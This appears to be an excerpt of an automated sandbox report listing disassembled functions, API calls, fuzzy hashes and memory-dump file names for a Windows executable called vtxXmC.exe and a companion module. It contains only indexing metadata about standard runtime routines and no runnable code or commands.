                          • API String ID: 1156100317-0
                          • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                          • Instruction ID: fd00043dbdc0e26984848d2a621f25d64e936447e0f616837a9782a9aca02444
                          • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                          • Instruction Fuzzy Hash: F91186FAF18B8B41F7561938EDAD37D11416F983B4F1C06B4E5EE362DA9E2C68414B01
                          APIs
                          • FlsGetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096A3
                          • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096C2
                          • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096EA
                          • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B096FB
                          • FlsSetValue.KERNEL32(?,?,?,00007FFB23B0766F,?,?,00000000,00007FFB23B0790A,?,?,?,?,?,00007FFB23B07896), ref: 00007FFB23B0970C
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                          • Instruction ID: 9a9512f9a42540bc6b862747460f43c28e09d573c58c3334cb0f0466792b34c7
                          • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                          • Instruction Fuzzy Hash: 29115E98B0C2C245FA56AF35DD9917D21619F583F0F5C43B5E8FE266E6EE2CE4418300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                          • Instruction ID: a78ce57e1de5c6efd0b1d20659454b6ab182629667e4fe25375986bf42d9c7e8
                          • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                          • Instruction Fuzzy Hash: 71110DD8A0D2C249F96AAF72DC9A17D21518F58370E1C07B5D8FE792E2EE2CB4418300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                          • Instruction ID: 608544a07c1e7e01f096f9bf6fffd21f97bd915f0b5be579cf2bc3c336a2214f
                          • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                          • Instruction Fuzzy Hash: 5F9192B7A187858AE711CF74D8882AD77A0F744788F18417AEA8D27B65DF38D195C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                          • Instruction ID: 86539e3abcfa84b2ee789653d1c768732146caefa166c70540bad34cec738614
                          • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                          • Instruction Fuzzy Hash: 3751907AB1D6828ADB158F39D88CA7C7391EB44B98F188171DA8E57788DF7DE841C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                          • Instruction ID: ce0ee3e96ed25f1bf347dc3f697a8b08adede76479ca64b5692b14bfa6c642ce
                          • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                          • Instruction Fuzzy Hash: C7618D7690CBC585DA228F25E8843AEB7A0FB84784F084266EBDD17B59CF7CD190CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                          • Instruction ID: 964e739289b67f9ad0e8c80ef6b3c265c76e4a4139bd071a2c1e04cbb002d54e
                          • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                          • Instruction Fuzzy Hash: 8A516BBA90C2C28AEB658F21D8C836C76A0EB54B84F1841B6DADD67B95CF3CF451C701
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: AddressHandleLoadModuleProc
                          • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                          • API String ID: 3055805555-3733552308
                          • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                          • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                          • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                          • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: Process$CurrentSizeWorking
                          • String ID: Shrinking process size
                          • API String ID: 2122760700-652428428
                          • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                          • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                          • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                          • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$Leave
                          • String ID:
                          • API String ID: 2801635615-0
                          • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                          • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                          • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                          • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                          • Instruction ID: 7e3e2b15fd44f0ed2f5712776c9062711b1aeff23b529e8db41c070b699e9d9c
                          • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                          • Instruction Fuzzy Hash: 8DD1C47AF18A8189E712CF75D8842EC37B1FB44B98B184276DE9D67B95DE38D406C340
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFB23B0ED07), ref: 00007FFB23B0EE38
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFB23B0ED07), ref: 00007FFB23B0EEC3
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: ConsoleErrorLastMode
                          • String ID:
                          • API String ID: 953036326-0
                          • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                          • Instruction ID: 038b2e624bf6f61932932c73940eff92ff04bab0843a94ed370339952cfbe303
                          • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                          • Instruction Fuzzy Hash: 5691C6BEF28A9585F7528F75D8C827D6BA0AB44F88F184175DE8E76684DF38D441C700
                          APIs
                          • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                          • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                          • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                          • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalEventSection$EnterLeaveReset
                          • String ID:
                          • API String ID: 3553466030-0
                          • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                          • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                          • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                          • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CriticalEventSection$EnterLeaveReset
                          • String ID:
                          • API String ID: 3553466030-0
                          • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                          • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                          • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                          • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                          • Instruction ID: 1703987ebb6ae05a9e8a0046b5cdec7ec529aaae1155a173a9b0b0a63eb22af1
                          • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                          • Instruction Fuzzy Hash: FF113A6AB14B418AEB00CF70EC583B833A4F719758F080E75DAAD967A4DF38D1588340
                          APIs
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: CreateEvent$CriticalInitializeSection
                          • String ID:
                          • API String ID: 926662266-0
                          • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                          • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                          • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                          • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: __except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 1467352782-3733052814
                          • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                          • Instruction ID: 5743eafedc82cf26ed1674fe0ba34b3f44d0f61a7ec9152a98fbdab1dada9a2f
                          • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                          • Instruction Fuzzy Hash: 2C717FBA90C6C58AD7628F35D8887BD7BA0FB04B84F188176DECC67A89CB2CD451C744
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: CreateFrameInfo__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2558813199-1018135373
                          • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                          • Instruction ID: 3f530ccdf84eb6b22e4b54b71aaac78048654cbaa97401d085703643f929d5d2
                          • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                          • Instruction Fuzzy Hash: 5A5162BA61878196D621EF35E88826D77A4FB89B90F180174EBCD17B55CF3CE461CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                          • String ID: 3M$C:\Users\user\Documents\vtxXmC.exe
                          • API String ID: 2724796048-3241273360
                          • Opcode ID: c7b6bf20ccc4f9845d0c36dee35ecfe46c8e6b938c98f74557c05a74a3d0106e
                          • Instruction ID: f5e6c968a4f643340020bf4fce3554ba52c45f1717354d1577bbc7becd4f653f
                          • Opcode Fuzzy Hash: c7b6bf20ccc4f9845d0c36dee35ecfe46c8e6b938c98f74557c05a74a3d0106e
                          • Instruction Fuzzy Hash: F94180BAA08A9285EB16EF31EC941BD6694BF44BC0B4C4075F9CE97B85DE3DE6418300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                          • Instruction ID: 523c8c87dd673b167e10579d1f79c7fa65344ea14935052ba305674c4325a4f8
                          • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                          • Instruction Fuzzy Hash: 3741A76AB29A8181DB21CF75E8883AD6761FB88B94F484131EECE97794DF7CD441CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266181560.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                          • Associated: 0000000C.00000002.2266166893.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266200767.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266215985.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 0000000C.00000002.2266231128.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_140000000_vtxXmC.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID: csm
                          • API String ID: 3997070919-1018135373
                          • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                          • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                          • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                          • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                          APIs
                            • Part of subcall function 00007FFB23B03A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB23B03A63
                          • __GSHandlerCheckCommon.LIBCMT ref: 00007FFB23B10993
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.2266264014.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                          • Associated: 0000000C.00000002.2266247516.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266285614.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266327700.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000C.00000002.2266343032.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_7ffb23b00000_vtxXmC.jbxd
                          Similarity
                          • API ID: CheckCommonHandler__except_validate_context_record
